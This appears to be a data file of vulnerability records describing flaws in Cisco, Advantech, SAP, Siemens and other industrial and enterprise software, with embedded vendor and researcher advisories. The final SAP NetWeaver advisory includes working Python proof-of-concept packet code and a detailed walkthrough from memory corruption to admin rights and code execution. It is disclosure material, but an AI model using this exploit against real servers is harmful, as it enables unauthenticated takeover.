var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-201904-0181 Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple stack-based buffer overflow vulnerabilities, caused by a lack of proper validation of the length of user-supplied data, may allow remote code execution. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwSyncDb.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA. This vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in execution to other associated memory locations. erroneous read and write operations
var-202301-2256 TrendNet Wireless AC Easy-Upgrader TEW-820AP v1.0R, firmware version 1.01.B01 was discovered to contain a stack overflow via the username parameter at /formWizardPassword. This vulnerability allows attackers to execute arbitrary code via a crafted payload. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. TrendNet Wireless AC Easy-Upgrader TEW-820AP Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. TRENDnet TEW-820AP is a router produced by TRENDnet
var-202212-1929 Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions "32" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "65" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU Firmware versions "29" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V Firmware versions "17" and prior, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU Firmware versions "05" and prior and Mitsubishi Electric Corporation MELIPC Series MI5122-VW Firmware versions "07" and prior allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery. This vulnerability information is provided by the developer for the purpose of dissemination to product users. JPCERT/CC Report to JPCERT/CC Coordinated with the developer.When a packet crafted by a remote third party is received, the product Ethernet Communication is a denial of service ( DoS ). In addition, reset of the product concerned is necessary for restoration
var-202405-0176 A vulnerability has been identified in CPCI85 Central Processing/Communication (All versions < V5.30), SICORE Base system (All versions < V1.3.0). The web interface of affected devices is vulnerable to command injection due to missing server side input sanitation. This could allow an authenticated privileged remote attacker to execute arbitrary code with root privileges. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the power supply sector. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks
var-202405-0175 A vulnerability has been identified in OPUPI0 AMQP/MQTT (All versions < V5.30). The affected devices stores MQTT client passwords without sufficient protection on the devices. An attacker with remote shell access or physical access could retrieve the credentials leading to confidentiality loss. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the power supply sector. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. Siemens SICAM products have a sensitive information plaintext storage vulnerability
var-202405-0174 A vulnerability has been identified in CPC80 Central Processing/Communication (All versions < V16.41), CPCI85 Central Processing/Communication (All versions < V5.30), CPCX26 Central Processing/Communication (All versions < V06.02), ETA4 Ethernet Interface IEC60870-5-104 (All versions < V10.46), ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2 (All versions < V03.27), PCCX26 Ax 1703 PE, Contr, Communication Element (All versions < V06.05). The affected devices contain an improper null termination vulnerability while parsing a specific HTTP header. This could allow an attacker to execute code in the context of the current process or lead to denial of service condition. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the field of power supply. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201801-0152 An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27e1 IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Multiple denial-of-service vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information
var-202001-0833 A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two 